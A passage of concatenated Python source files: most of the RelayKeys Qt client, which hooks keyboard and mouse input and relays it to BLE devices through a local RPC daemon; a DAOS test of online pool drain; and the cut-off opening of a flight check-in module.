            self.hlayout.removeItem(item)
            layout_del_inner(item)
        self.items = []
        fontsize = 10
        for i in range(len(keys)):
            self._addItemLabel("<font style='font-weight:bold;' size='{fontsize}'>{text}</font>"
                               .format(text=keys[i], fontsize=fontsize))
            if i + 1 != len(keys) or len(modifiers) > 0:
                self.addPlusLabel()
        for i in range(len(modifiers)):
            self._addItemLabel("<font style='font-weight:bold;' size='{fontsize}'>{text}</font>"
                               .format(text=modifiers[i], fontsize=fontsize))
            if i + 1 != len(modifiers) or len(unknown_keys) > 0:
                self.addPlusLabel()
        for i in range(len(unknown_keys)):
            # Unknown codes are shown in dark red as hex.
            self._addItemLabel("<font style='font-weight:bold;color:darkred;' size='{fontsize}'>{text}</font>"
                               .format(text="??(0x{:02x})".format(unknown_keys[i]), fontsize=fontsize))
            if i + 1 != len(unknown_keys):
                self.addPlusLabel()
class Window (QMainWindow):
    """Main RelayKeys window.

    Hooks local keyboard/mouse events (pyWinhook), displays the current key
    state, and forwards input actions to the RelayKeys daemon through an RPC
    client running on a background worker thread.
    """

    # Emitted from worker threads so the error box is shown on the GUI thread.
    showErrorMessageSignal = pyqtSignal(str)

    def __init__(self, args, config):
        self.devList = []
        super(Window, self).__init__()
        clientconfig = config["client"]
        self.showErrorMessageSignal.connect(self.showErrorMessage)
        # Forwarding state: keyboard starts enabled, mouse starts disabled.
        self._keyboard_disabled = False
        self._mouse_disabled = True
        self._keystate_update_timer = None
        self._keys = []
        self._modifiers = []
        self._unknown_keys = []
        # Toggle shortcuts (key + comma-separated modifiers) from config.
        self._keyboard_toggle_key = clientconfig.get("keyboard_togglekey", "A")
        self._keyboard_toggle_modifiers = clientconfig.get(
            "keyboard_togglemods", "LALT").split(",")
        self._mouse_toggle_key = clientconfig.get("mouse_togglekey", "S")
        self._mouse_toggle_modifiers = clientconfig.get(
            "mouse_togglemods", "LALT").split(",")
        self._last_mouse_pos = None
        self._curBleDeviceName = '---'
        # Build the RPC client: explicit host/port config wins over URL.
        url = clientconfig.get("url", None) if args.url == None else args.url
        host = clientconfig.get("host", None)
        port = clientconfig.get("port", None)
        if url is None and not (host is None and port is None):
            self.client = RelayKeysClient(host=host, port=port,
                                          username=clientconfig.get(
                                              "username", None),
                                          password=clientconfig.get("password", None))
        else:
            if url is None:
                url = "http://localhost:5383/"
            self.client = RelayKeysClient(url=url)
        # Outgoing actions are queued here and flushed by client_worker.
        self._client_queue = Queue(64)
        t = Thread(target=self.client_worker, args=(self._client_queue,))
        t.start()
        self.initHooks()
        # self.createTrayIcon()
        # icon = QIcon(':/.ico')
        # self.trayIcon.setIcon(icon)
        # self.setWindowIcon(icon)
        # self.trayIcon.show()
        # self.setWindowFlags(Qt.WindowStaysOnTopHint)
        mainLayout = QVBoxLayout()
        controlBar = QHBoxLayout()
        keyboardControlSect = QVBoxLayout()
        self.keyboardControlLabel = QLabel()
        keyboardControlSect.addWidget(self.keyboardControlLabel)
        self.keyboardToggleButton = QPushButton()
        self.keyboardToggleButton.setText('Toggle: {}'.format(self.getShortcutText(
            self._keyboard_toggle_key, self._keyboard_toggle_modifiers)))
        self.keyboardToggleButton.setToolTip('Keyboard disable toggle')
        self.keyboardToggleButton.clicked.connect(self.didClickKeyboardToggle)
        keyboardControlSect.addWidget(self.keyboardToggleButton)
        mouseControlSect = QVBoxLayout()
        self.mouseControlLabel = QLabel()
        mouseControlSect.addWidget(self.mouseControlLabel)
        self.mouseToggleButton = QPushButton()
        self.mouseToggleButton.setText('Toggle: {}'.format(
            self.getShortcutText(self._mouse_toggle_key, self._mouse_toggle_modifiers)))
        self.mouseToggleButton.setToolTip('Mouse disable toggle')
        self.mouseToggleButton.clicked.connect(self.didClickMouseToggle)
        mouseControlSect.addWidget(self.mouseToggleButton)
        bleControlBar = QHBoxLayout()
        self.bleConnectionSwitch = QPushButton()
        self.bleConnectionSwitch.setText('BLE Switch')
        self.bleConnectionSwitch.setToolTip('swicth ble device connection')
        self.bleConnectionSwitch.clicked.connect(self.sendBleToggleCommand)
        self.bleDeviceRead = QPushButton()
        self.bleDeviceRead.setText('Cur Device: {}'.format(self._curBleDeviceName))
        self.bleDeviceRead.setToolTip('swicth ble device connection')
        self.bleDeviceRead.clicked.connect(self.readBleDeviceName)
        bleControlBar.addWidget(self.bleConnectionSwitch)
        bleControlBar.addWidget(self.bleDeviceRead)
        self.updateTogglesStatus()
        controlBar.addLayout(keyboardControlSect)
        controlBar.addLayout(mouseControlSect)
        mainLayout.addLayout(controlBar)
        mainLayout.addLayout(bleControlBar)
        self.keyboardStatusWidget = KeyboardStatusWidget()
        mainLayout.addWidget(self.keyboardStatusWidget)
        # Optional "last N typed characters" display (0 disables it).
        try:
            self._show_last_n_chars = int(
                clientconfig.get("show_last_n_chars", "20"), 10)
        except ValueError:
            self._show_last_n_chars = 0
        if self._show_last_n_chars > 0:
            self._last_n_chars = []
            self._show_last_n_chars_label = QLabel()
            label = self._show_last_n_chars_label
            label.setContentsMargins(5, 5, 5, 5)
            label.setAlignment(Qt.AlignVCenter)
            label.setAutoFillBackground(True)
            p = label.palette()
            p.setColor(label.backgroundRole(), Qt.white)
            label.setPalette(p)
            fontsize = 10
            label.setText("<font style='font-weight:bold;' size='{fontsize}'>{text}</font>"
                          .format(text="", fontsize=fontsize))
            mainLayout.addWidget(label)
        widget = QWidget(self)
        self.setCentralWidget(widget)
        layout = QVBoxLayout()
        layout.addLayout(mainLayout)
        widget.setLayout(layout)
        self.setContentsMargins(0, 0, 0, 0)
        self.setWindowTitle("Relay Keys Display")
        self.resize(400, 250)
        # New Menu
        self.userMenu = self.menuBar()
        # Device Menu
        self.deviceMenu = QMenu("&Devices", self)
        self.actionAddNewDevice = QAction("Add BLE Device", self)
        self.actionAddNewDevice.triggered.connect(self.addDeviceButtonClicked)
        self.deviceMenu.addAction(self.actionAddNewDevice)
        self.removeDeviceMenu = QMenu("&Remove BLE Device", self)
        self.actionResetDevices = QAction("Reset BLE Device List", self)
        self.actionResetDevices.triggered.connect(self.resetDeviceListButtonClicked)
        self.removeDeviceMenu.addAction(self.actionResetDevices)
        self.removeDeviceMenu.addSeparator()
        self.deviceMenu.addMenu(self.removeDeviceMenu)
        self.actionRefreshDevices = QAction("Refresh Device List", self)
        self.actionRefreshDevices.triggered.connect(self.refreshDeviceListButtonClicked)
        self.deviceMenu.addAction(self.actionRefreshDevices)
        self.userMenu.addMenu(self.deviceMenu)
        # Help Menu
        self.helpMenu = self.userMenu.addMenu("&Help")
        self.helpMenuGitHubDoc = QAction("Git Hub Docs", self)
        self.helpMenuGitHubDoc.triggered.connect(self.openGitHubUrl)
        self.helpMenu.addAction(self.helpMenuGitHubDoc)
        self.helpMenuAceCentre = QAction("Ace Centre", self)
        self.helpMenuAceCentre.triggered.connect(self.openAceCentreUrl)
        self.helpMenu.addAction(self.helpMenuAceCentre)
        # Ask the daemon for the current device name and known device list.
        self.send_action('ble_cmd', 'devname')
        self.send_action('ble_cmd', 'devlist')

    def didShowWindow(self):
        # Hook for post-show work; currently unused.
        pass

    @pyqtSlot()
    def readBleDeviceName(self):
        """Query the daemon for the currently connected BLE device name."""
        self.send_action('ble_cmd', 'devname')

    @pyqtSlot()
    def sendBleToggleCommand(self):
        """Ask the daemon to switch to the next BLE device."""
        self.send_action('ble_cmd', 'switch')

    @pyqtSlot()
    def didClickKeyboardToggle(self):
        """Toggle keyboard forwarding and clear the shown key state."""
        self._keyboard_disabled = not self._keyboard_disabled
        self.keyboardStatusWidget.updateStatusSignal.emit([], [], [])
        self.updateTogglesStatus()

    @pyqtSlot()
    def didClickMouseToggle(self):
        """Toggle mouse forwarding."""
        self._mouse_disabled = not self._mouse_disabled
        self.updateTogglesStatus()

    def getShortcutText(self, key, modifiers):
        """Human-readable 'KEY + MOD + MOD' text for a shortcut."""
        return " + ".join((key, ) + tuple(modifiers))

    #Menu Functions
    def openGitHubUrl(self):
        url = QUrl('https://acecentre.github.io/RelayKeys/')
        if not QDesktopServices.openUrl(url):
            QMessageBox.warning(self, 'Open Url', 'Could not open url')

    def openAceCentreUrl(self):
        url = QUrl('https://acecentre.org.uk/')
        if not QDesktopServices.openUrl(url):
            QMessageBox.warning(self, 'Open Url', 'Could not open url')

    def clearRemoveDeviceMenu(self):
        """Reset the 'Remove BLE Device' submenu to just the reset action."""
        self.removeDeviceMenu.clear()
        self.actionResetDevices = QAction("Reset BLE Device List", self)
        self.actionResetDevices.triggered.connect(self.resetDeviceListButtonClicked)
        self.removeDeviceMenu.addAction(self.actionResetDevices)
        self.removeDeviceMenu.addSeparator()

    def resetDeviceListButtonClicked(self):
        self.send_action('ble_cmd', 'devreset')

    def refreshDeviceListButtonClicked(self):
        self.send_action('ble_cmd', 'devlist')

    def removeDeviceButtonClicked(self):
        # The triggering QAction's text holds the device entry; the first two
        # characters are skipped (menu prefix) before sending it to the daemon.
        action = self.sender()
        self.send_action('ble_cmd', 'devremove|' + action.text()[2:])

    def addDeviceUpdateDialog(self, found):
        """Poll handler while the 'Add BLE Device' dialog is open.

        Re-requests the device list and stops the polling worker either when a
        new device shows up or when the dialog was closed.
        """
        self.send_action('ble_cmd', 'devlist')
        if self.oldDevList != self.devList and len(self.devList):
            self.BLEStatusLabel.setText("New Device Added")
            self.addBLEDeviceOK.setEnabled(True)
            self.workerBLE.stop()
            self.BLEthread.quit()
            self.BLEthread.wait()
        if self.addBLEDialog.isVisible() == False:
            self.workerBLE.stop()
            self.BLEthread.quit()
            self.BLEthread.wait()

    def addDeviceButtonClicked(self):
        """Open the 'Add New BLE Device' dialog backed by a polling QThread."""
        class BLEWorker(QObject):
            # Worker object that ticks once a second until stopped.
            finished = pyqtSignal()
            progress = pyqtSignal(int)

            def __init__(self):
                super(BLEWorker, self).__init__()
                self._isRunning = True

            def run(self):
                while self._isRunning:
                    sleep(1)
                    self.progress.emit(2)

            def stop(self):
                self._isRunning = False
        self.send_action('ble_cmd', 'devadd')
        self.oldDevList = self.devList
        self.devList = []
        self.addBLEDialog = QDialog(self)
        self.addBLEDialog.setWindowTitle("Add New BLE Device")
        self.BLElayout = QVBoxLayout()
        self.BLEStatusLabel = QLabel()
        self.BLElayout.addWidget(self.BLEStatusLabel)
        bleControlBar = QHBoxLayout()
        self.addBLEDeviceOK = QPushButton()
        self.addBLEDeviceOK.setText("OK")
        self.addBLEDeviceOK.clicked.connect(self.addBLEDialog.accept)
        self.addBLEDeviceCancel = QPushButton()
        self.addBLEDeviceCancel.setText("Cancel")
        self.addBLEDeviceCancel.clicked.connect(self.addBLEDialog.reject)
        bleControlBar.addWidget(self.addBLEDeviceOK)
        bleControlBar.addWidget(self.addBLEDeviceCancel)
        self.BLElayout.addLayout(bleControlBar)
        self.BLEStatusLabel.setText("Waiting for device...")
        self.addBLEDialog.setLayout(self.BLElayout)
        self.addBLEDialog.resize(400, 125)
        # Standard Qt worker-object pattern: worker moved onto its own thread.
        self.BLEthread = QThread()
        self.workerBLE = BLEWorker()
        self.workerBLE.moveToThread(self.BLEthread)
        self.BLEthread.started.connect(self.workerBLE.run)
        self.workerBLE.finished.connect(self.BLEthread.quit)
        self.workerBLE.finished.connect(self.workerBLE.deleteLater)
        self.BLEthread.finished.connect(self.BLEthread.deleteLater)
        self.workerBLE.progress.connect(self.addDeviceUpdateDialog)
        self.addBLEDeviceOK.setEnabled(False)
        self.BLEthread.start()
        self.BLEthread.finished.connect(
            lambda: self.addBLEDeviceOK.setEnabled(True)
        )
        self.addBLEDialog.exec()

    def updateTogglesStatus(self):
        """Refresh the keyboard/mouse enabled-state labels."""
        fontsize = 5
        self.keyboardControlLabel.setText("<font style='color: {color}; font-weight:bold;' size='{fontsize}'>{text}</font>"
                                          .format(text="Keyboard Disabled" if self._keyboard_disabled else "Keyboard Enabled", fontsize=fontsize,
                                                  color="#777" if self._keyboard_disabled else "#222"))
        self.mouseControlLabel.setText("<font style='color: {color}; font-weight:bold;' size='{fontsize}'>{text}</font>"
                                       .format(text="Mouse Disabled" if self._mouse_disabled else "Mouse Enabled", fontsize=fontsize,
                                               color="#777" if self._mouse_disabled else "#222"))

    def updateShowLastChars(self):
        """Refresh the 'last typed characters' label.

        NOTE(review): self._show_last_n_chars_label is only assigned in
        __init__ when show_last_n_chars > 0; callers appear to guard on that —
        confirm before calling from elsewhere.
        """
        label = self._show_last_n_chars_label
        if label is None:
            return
        fontsize = 10
        text = " ".join(self._last_n_chars)
        label.setText("<font style='font-weight:bold;' size='{fontsize}'>{text}</font>"
                      .format(text=text, fontsize=fontsize))

    def createTrayIcon(self):
        # Currently unused (see commented-out calls in __init__).
        self.trayIconMenu = QMenu(self)
        self.trayIconMenu.addAction(
            QAction("Quit", self, triggered=self.onQuit))
        # self.trayIconMenu.addSeparator()
        self.trayIcon = QSystemTrayIcon(self)
        self.trayIcon.setContextMenu(self.trayIconMenu)

    def onQuit(self):
        # Tell the client worker thread to exit, then quit the app.
        self._client_queue.put(("EXIT",))
        app.quit()
        # exit(0)

    def closeEvent(self, event):
        # Window closed: stop the client worker thread.
        self._client_queue.put(("EXIT",))

    def initHooks(self):
        """Install global keyboard and mouse hooks (pyWinhook)."""
        hm = PyHook3.HookManager()
        hm.KeyDown = self.onKeyboardDown
        hm.KeyUp = self.onKeyboardUp
        hm.HookKeyboard()
        hm.MouseAll = self.onMouseEvent
        hm.HookMouse()
        self._hookmanager = hm
        # pythoncom.PumpMessages()

    def showErrorMessage(self, msg):
        # Shown on the GUI thread via showErrorMessageSignal; also disables
        # keyboard forwarding so the user regains local input.
        QMessageBox.critical(None, "RelayKeys Error", msg)
        self._keyboard_disabled = True

    def client_worker(self, queue):
        """Background thread: drain the action queue roughly every 50ms,
        merge consecutive mousemove actions, and send the batch via RPC.
        Exits when an ("EXIT",) item is seen."""
        lasttime = time()
        while True:
            ctime = time()
            sleeptime = 0.050 - (ctime - lasttime)
            if sleeptime > 0:
                sleep(sleeptime)
            lasttime = ctime
            inputlist = []
            try:
                # Drain everything currently queued without blocking.
                while True:
                    inputlist.append(queue.get(False))
                    queue.task_done()
            except EmptyQueue:
                if len(inputlist) == 0:
                    continue
            have_exit = len(
                list(filter(lambda a: a[0] == 'EXIT', inputlist))) > 0
            if have_exit:
                break
            # expecting the rest are actions
            # merge mousemove actions
            mousemove_list = tuple(
                filter(lambda a: a[0] == 'mousemove', inputlist))
            if len(mousemove_list) > 1:
                inputlist = list(
                    filter(lambda a: a[0] != 'mousemove', inputlist))
                # Sum dx, dy (and wheel fields) across all queued moves.
                mousemove = ['mousemove']
                for i in range(1, 5):
                    mousemove.append(
                        sum(map(lambda a: a[i] if len(a) > i else 0, mousemove_list)))
                inputlist.append(tuple(mousemove))
            # send actions
            if not self.client_send_actions(inputlist):
                # an error occurred, empty out the queue
                try:
                    while True:
                        queue.get(False)
                        queue.task_done()
                except EmptyQueue:
                    pass

    def client_send_actions(self, actions):
        """Send a batch of actions via RPC; update device UI from ble_cmd
        responses. Returns True on success, False on any failure."""
        try:
            ret = self.client.actions(actions)
            if 'result' not in ret:
                logging.error("actions {} response error: {}".format(
                    ", ".join(map(str, actions)), ret.get("error", "undefined")))
                self.showErrorMessageSignal.emit("Failed to send the message!")
            else:
                # 'result' holds one entry per action, in order.
                result = 0
                for action in actions:
                    if action[0] == 'ble_cmd':
                        if action[1] == 'devname':
                            self._curBleDeviceName = ret['result'][result]
                            self.bleDeviceRead.setText(
                                'Cur Device: {}'.format(self._curBleDeviceName))
                        if action[1] == 'devlist':
                            # Rebuild the remove-device menu, filtering out
                            # status strings the daemon mixes into the list.
                            self.clearRemoveDeviceMenu()
                            self.devList = []
                            for device in ret['result'][result]:
                                if 'Device found in list - ' not in device \
                                        and 'Disconnected - Device already present in list' not in device \
                                        and 'ERROR:' not in device \
                                        and 'OK' not in device \
                                        and 'SUCCESS' not in device:
                                    self.removeDeviceMenu.addAction(device, self.removeDeviceButtonClicked)
                                    self.devList.append(device)
                        if action[1] == 'devreset':
                            self.clearRemoveDeviceMenu()
                            self.devList = []
                        if 'devremove' in action[1]:
                            # Refresh the list after a removal.
                            self.send_action('ble_cmd', 'devlist')
                    result = result + 1
                logging.info("actions {} response: {}".format(
                    ", ".join(map(str, actions)), ret["result"]))
            return True
        except:
            logging.error("actions {} raise: {}".format(
                ", ".join(map(str, actions)), traceback.format_exc()))
            self.showErrorMessageSignal.emit("Failed to send the message!")
            return False

    def client_send_action(self, action, *args):
        """Invoke a single named RPC method directly (bypasses the queue)."""
        try:
            func = getattr(self.client, action, None)
            if func == None:
                raise ValueError("unknown action: {}".format(action))
            ret = func(*args)
            if 'result' not in ret:
                logging.error("{} ({}) response error: {}".format(
                    action, ", ".join(map(str, args)), ret.get("error", "undefined")))
                # self.showErrorMessageSignal.emit("Failed to send the message!")
            else:
                logging.info("{} ({}) response: {}".format(
                    action, ", ".join(map(str, args)), ret["result"]))
            return True
        except:
            logging.error("{} ({}) raise: {}".format(
                action, ", ".join(map(str, args)), traceback.format_exc()))
            # self.showErrorMessageSignal.emit("Failed to send the message!")
            return False

    def send_action(self, action, *args):
        """Queue one action tuple for the client worker thread."""
        self._client_queue.put((action,) + args)

    def checkShortcutTrigger(self, key, mods, tkey, tmods):
        """True when (key, mods) exactly matches the shortcut (tkey, tmods)."""
        match = False
        if ((tkey is None and len(tmods) > 0) or key == tkey) and \
                len(tmods) == len(mods):
            match = True
            for tmod in tmods:
                if tmod not in mods:
                    match = False
                    break
        return match

    def _keyboardToggleCheck(self, key):
        """Handle the keyboard/mouse toggle shortcuts.

        Returns False when a toggle fired (event consumed), None otherwise.
        """
        if self.checkShortcutTrigger(key, self._modifiers, self._keyboard_toggle_key, self._keyboard_toggle_modifiers):
            self._keyboard_disabled = not self._keyboard_disabled
            self.keyboardStatusWidget.updateStatusSignal.emit([], [], [])
            self.updateTogglesStatus()
            return False
        elif self.checkShortcutTrigger(key, self._modifiers, self._mouse_toggle_key, self._mouse_toggle_modifiers):
            self._mouse_disabled = not self._mouse_disabled
            self.updateTogglesStatus()
            return False
        return None

    def onKeyboardDown(self, event):
        """Keyboard hook (key press). Returning False blocks the local event;
        True lets it pass through."""
        key = keysmap.get(event.KeyID, None)
        mod = modifiers_map.get(event.KeyID, None)
        # Track pressed keys/modifiers/unknown codes for the status display.
        if key is not None:
            if key not in self._keys:
                self._keys.append(key)
        elif mod is not None:
            if mod not in self._modifiers:
                self._modifiers.append(mod)
        elif event.KeyID not in self._unknown_keys:
            self._unknown_keys.append(event.KeyID)
        ret = self._keyboardToggleCheck(key)
        if ret is not None:
            return ret
        if self._keyboard_disabled:
            return True
        self.updateKeyboardState()
        if key is not None:
            if self._show_last_n_chars > 0:
                # NOTE(review): 'chr' shadows the builtin here.
                chr = char_keysmap.get(event.KeyID, None)
                if chr is not None and len(chr) > 0:
                    if isinstance(chr, (tuple)):
                        # Pick the shifted variant when a shift is held.
                        chr = chr[0] if len(chr) == 1 or \
                            ("LSHIFT" not in self._modifiers and "RSHIFT" not in self._modifiers) else chr[1]
                    while len(self._last_n_chars) >= self._show_last_n_chars:
                        self._last_n_chars.pop(0)
                    self._last_n_chars.append(chr)
                    self.updateShowLastChars()
            self.send_action('keyevent', key, self._modifiers, True)
            return False
        elif mod is not None:
            # set the modifiers
            self.send_action('keyevent', None, self._modifiers, False)
            return False
        return True

    def onKeyboardUp(self, event):
        """Keyboard hook (key release); mirrors onKeyboardDown."""
        key = keysmap.get(event.KeyID, None)
        mod = modifiers_map.get(event.KeyID, None)
        if key is not None and key in self._keys:
            self._keys.remove(key)
        elif mod is not None and mod in self._modifiers:
            self._modifiers.remove(mod)
        else:
            try:
                self._unknown_keys.remove(event.KeyID)
            except:
                pass
        if self._keyboard_disabled:
            return True
        self.updateKeyboardState()
        if key is not None:
            self.send_action('keyevent', key, self._modifiers, False)
            return False
        elif mod is not None:
            # set the modifiers
            self.send_action('keyevent', None, self._modifiers, False)
            return False
        return True

    def onMouseEvent(self, event):
        """Mouse hook: forward moves/buttons/wheel when mouse forwarding is on."""
        if self._mouse_disabled:
            return True
        if event.Message == PyHook3.HookConstants.WM_MOUSEMOVE:
            if self._last_mouse_pos is None:
                self._last_mouse_pos = event.Position
                return True
            # NOTE(review): _last_mouse_pos is never updated after it is first
            # set, so deltas are relative to that anchor — presumably because
            # blocked events keep the local cursor pinned there; confirm.
            dx, dy = event.Position[0] - \
                self._last_mouse_pos[0], event.Position[1] - \
                self._last_mouse_pos[1]
            self.send_action('mousemove', dx, dy)
        elif event.Message == PyHook3.HookConstants.WM_LBUTTONDOWN:
            self.send_action('mousebutton', 'l', 'press')
        elif event.Message == PyHook3.HookConstants.WM_LBUTTONUP:
            self.send_action('mousebutton', '0')
        elif event.Message == PyHook3.HookConstants.WM_LBUTTONDBLCLK:
            self.send_action('mousebutton', 'l', 'doubleclick')
        elif event.Message == PyHook3.HookConstants.WM_RBUTTONDOWN:
            self.send_action('mousebutton', 'r', 'press')
        elif event.Message == PyHook3.HookConstants.WM_RBUTTONUP:
            self.send_action('mousebutton', '0')
        elif event.Message == PyHook3.HookConstants.WM_RBUTTONDBLCLK:
            self.send_action('mousebutton', 'r', 'doubleclick')
        elif event.Message == PyHook3.HookConstants.WM_MBUTTONDOWN:
            self.send_action('mousebutton', 'm', 'press')
        elif event.Message == PyHook3.HookConstants.WM_MBUTTONUP:
            self.send_action('mousebutton', '0')
        elif event.Message == PyHook3.HookConstants.WM_MBUTTONDBLCLK:
            self.send_action('mousebutton', 'm', 'doubleclick')
        elif event.Message == PyHook3.HookConstants.WM_MOUSEWHEEL:
            self.send_action('mousemove', 0, 0, event.Wheel)
        return False

    def onUpdateKeyState(self):
        """This update event handler is used to update shown state of keyboard
        """
        self.keyboardStatusWidget.updateStatusSignal.emit(
            self._keys, self._modifiers, self._unknown_keys)

    def updateKeyboardState(self):
        # Debounce display updates: restart a 50ms one-shot timer.
        if self._keystate_update_timer != None:
            self._keystate_update_timer.cancel()
        self._keystate_update_timer = Timer(0.05, self.onUpdateKeyState)
        self._keystate_update_timer.start()
def main():
    """Parse arguments, load config, and run the Qt application.

    Returns:
        The Qt event-loop exit code.
    """
    # fix: Window.onQuit() calls the module-level name 'app'; binding it
    # globally here prevents a NameError when quitting from the tray menu.
    global app
    args = parser.parse_args()
    # init logger
    logger = logging.getLogger()
    logger.addHandler(logging.StreamHandler())  # fix: reuse 'logger' instead of a second getLogger() call
    logger.setLevel(logging.DEBUG if args.debug else logging.INFO)
    config = ConfigParser()
    dirname = os.path.dirname(os.path.realpath(sys.argv[0]))
    if args.config is None:
        # Default search order: user home first, then the app directory.
        config.read([
            os.path.expanduser('~/.relaykeys.cfg'),
            os.path.join(dirname, 'relaykeys.cfg'),
        ])
    else:
        config.read([args.config])
    if "client" not in config.sections():
        config["client"] = {}
    app = QApplication(sys.argv)
    # fix: dropped the original no-op 'try: ... except: raise' wrapper.
    QApplication.setQuitOnLastWindowClosed(True)
    window = Window(args, config)
    window.show()
    window.didShowWindow()
    return app.exec_()
if __name__ == '__main__':
    # Run the application and propagate its exit status to the shell.
    exit(main())
|
osa_online_drain.py | #!/usr/bin/python
"""
(C) Copyright 2020-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import time
import random
import threading
from test_utils_pool import TestPool
from write_host_file import write_host_file
from osa_utils import OSAUtils
from daos_utils import DaosCommand
from apricot import skipForTicket
class OSAOnlineDrain(OSAUtils):
    # pylint: disable=too-many-ancestors
    """
    Test Class Description: This test runs
    daos_server Online Drain test cases.
    :avocado: recursive
    """

    def setUp(self):
        """Set up for test case."""
        super().setUp()
        self.dmg_command = self.get_dmg_command()
        self.daos_command = DaosCommand(self.bin)
        # IOR flags and test object classes come from the avocado YAML config.
        self.ior_test_sequence = self.params.get(
            "ior_test_sequence", '/run/ior/iorflags/*')
        self.test_oclass = self.params.get("oclass", '/run/test_obj_class/*')
        # Recreate the client hostfile without slots defined
        self.hostfile_clients = write_host_file(
            self.hostlist_clients, self.workdir, None)
        self.pool = None
        self.dmg_command.exit_status_exception = True

    def run_online_drain_test(self, num_pool, oclass=None, app_name="ior"):
        """Run the Online drain without data.

        Creates `num_pool` pools, starts an IOR/mdtest writer thread per
        pool, drains one random rank (two adjacent targets) while the
        writer runs, and verifies the pool map version increments, the
        data is readable, and the container passes a consistency check.

        Args:
            num_pool(int) : total pools to create for testing purposes.
            oclass(str) : Object class type (RP_2G1, etc)
            app_name(str) : application to run on parallel (ior or mdtest)
                Defaults to ior.
        """
        # Create a pool
        pool = {}
        target_list = []
        if oclass is None:
            oclass = self.ior_cmd.dfs_oclass.value
        test_seq = self.ior_test_sequence[0]
        drain_servers = (len(self.hostlist_servers) * 2) - 1
        # Exclude target : random two targets (target idx : 0-7)
        n = random.randint(0, 6)
        target_list.append(n)
        target_list.append(n+1)
        t_string = "{},{}".format(target_list[0], target_list[1])
        # Drain one of the ranks (or server)
        rank = random.randint(1, drain_servers)
        for val in range(0, num_pool):
            pool[val] = TestPool(self.context, self.get_dmg_command())
            pool[val].get_params(self)
            pool[val].create()
            # Disable space reclamation so space accounting stays predictable
            # unless the aggregation variant re-enables it.
            pool[val].set_property("reclaim", "disabled")
        # Drain the rank and targets
        for val in range(0, num_pool):
            threads = []
            self.pool = pool[val]
            # Instantiate aggregation
            if self.test_during_aggregation is True:
                for _ in range(0, 2):
                    self.run_ior_thread("Write", oclass, test_seq)
                self.delete_extra_container(self.pool)
            # The following thread runs while performing osa operations.
            if app_name == "ior":
                threads.append(threading.Thread(target=self.run_ior_thread,
                                                kwargs={"action": "Write",
                                                        "oclass": oclass,
                                                        "test": test_seq}))
            else:
                threads.append(threading.Thread(target=self.run_mdtest_thread))
            # Launch the IOR threads
            for thrd in threads:
                self.log.info("Thread : %s", thrd)
                thrd.start()
                time.sleep(1)
            # Wait the threads to write some data before drain.
            time.sleep(5)
            self.pool.display_pool_daos_space("Pool space: Beginning")
            pver_begin = self.get_pool_version()
            self.log.info("Pool Version at the beginning %s", pver_begin)
            output = self.dmg_command.pool_drain(self.pool.uuid,
                                                 rank, t_string)
            self.print_and_assert_on_rebuild_failure(output)
            pver_drain = self.get_pool_version()
            self.log.info("Pool Version after drain %s", pver_drain)
            # Check pool version incremented after pool exclude
            self.assertTrue(pver_drain > pver_begin,
                            "Pool Version Error: After drain")
            # Wait to finish the threads
            for thrd in threads:
                thrd.join()
                # Writer threads report failures through self.out_queue.
                if not self.out_queue.empty():
                    self.assert_on_exception()
        for val in range(0, num_pool):
            display_string = "Pool{} space at the End".format(val)
            self.pool = pool[val]
            self.pool.display_pool_daos_space(display_string)
        # Read back the data written during the drain and verify the
        # container's consistency with `daos container check`.
        self.run_ior_thread("Read", oclass, test_seq)
        self.container = self.pool_cont_dict[self.pool][0]
        kwargs = {"pool": self.pool.uuid,
                  "cont": self.container.uuid}
        output = self.daos_command.container_check(**kwargs)
        self.log.info(output)

    @skipForTicket("DAOS-7289")
    def test_osa_online_drain(self):
        """Test ID: DAOS-4750
        Test Description: Validate Online drain with checksum
        enabled.
        :avocado: tags=all,pr,daily_regression
        :avocado: tags=hw,medium,ib2
        :avocado: tags=osa,checksum
        :avocado: tags=osa_drain,online_drain,online_drain_with_csum
        """
        self.log.info("Online Drain : With Checksum")
        self.run_online_drain_test(1)

    @skipForTicket("DAOS-7289")
    def test_osa_online_drain_no_csum(self):
        """Test ID: DAOS-6909
        Test Description: Validate Online drain without enabling
        checksum.
        :avocado: tags=all,pr,full_regression
        :avocado: tags=hw,medium,ib2
        :avocado: tags=osa
        :avocado: tags=osa_drain,online_drain,online_drain_without_csum
        """
        self.log.info("Online Drain : No Checksum")
        self.test_with_checksum = self.params.get("test_with_checksum",
                                                  '/run/checksum/*')
        self.run_online_drain_test(1)

    @skipForTicket("DAOS-7289")
    def test_osa_online_drain_oclass(self):
        """Test ID: DAOS-6909
        Test Description: Validate Online drain with different
        object class.
        :avocado: tags=all,pr,full_regression
        :avocado: tags=hw,medium,ib2
        :avocado: tags=osa,checksum
        :avocado: tags=osa_drain,online_drain,online_drain_oclass
        """
        self.log.info("Online Drain : Oclass")
        # Repeat the drain once per configured object class.
        for oclass in self.test_oclass:
            self.run_online_drain_test(1, oclass=oclass)

    @skipForTicket("DAOS-7289")
    def test_osa_online_drain_with_aggregation(self):
        """Test ID: DAOS-6909
        Test Description: Validate Online drain with different
        object class.
        :avocado: tags=all,pr,full_regression
        :avocado: tags=hw,medium,ib2
        :avocado: tags=osa,checksum
        :avocado: tags=osa_drain,online_drain,online_drain_with_aggregation
        """
        self.log.info("Online Drain : Aggregation")
        self.test_during_aggregation = self.params.get("test_with_aggregation",
                                                       '/run/aggregation/*')
        self.run_online_drain_test(1)

    @skipForTicket("DAOS-7289")
    def test_osa_online_drain_mdtest(self):
        """Test ID: DAOS-4750
        Test Description: Validate Online drain with mdtest
        running during the testing.
        :avocado: tags=all,pr,daily_regression
        :avocado: tags=hw,medium,ib2
        :avocado: tags=osa,checksum
        :avocado: tags=osa_drain,online_drain,online_drain_mdtest
        """
        self.log.info("Online Drain : With Mdtest")
        self.run_online_drain_test(1, app_name="mdtest")
|
flight.py | from __future__ import annotations
from datetime import datetime, timedelta
import time
from threading import Thread
from typing import Any, Dict, Optional, TYPE_CHECKING
import pytz
import requests
from .general import make_request
if TYPE_CHECKING:
from account import Account
# Relative API path for the check-in endpoints; the confirmation number
# is appended when making the request.
CHECKIN_URL = "mobile-air-operations/v1/mobile-air-operations/page/check-in/"
class Flight:
    """One reservation leg that schedules and performs its own check-in.

    On construction, flight details are extracted from the reservation
    JSON and a background thread is started that sleeps until 24 hours
    before departure and then checks in.
    """

    def __init__(self, account: Optional[Account], confirmation_number: str,
                 flight: Dict[str, Any]) -> None:
        # NOTE(review): `flight` was annotated as `Flight` but the code
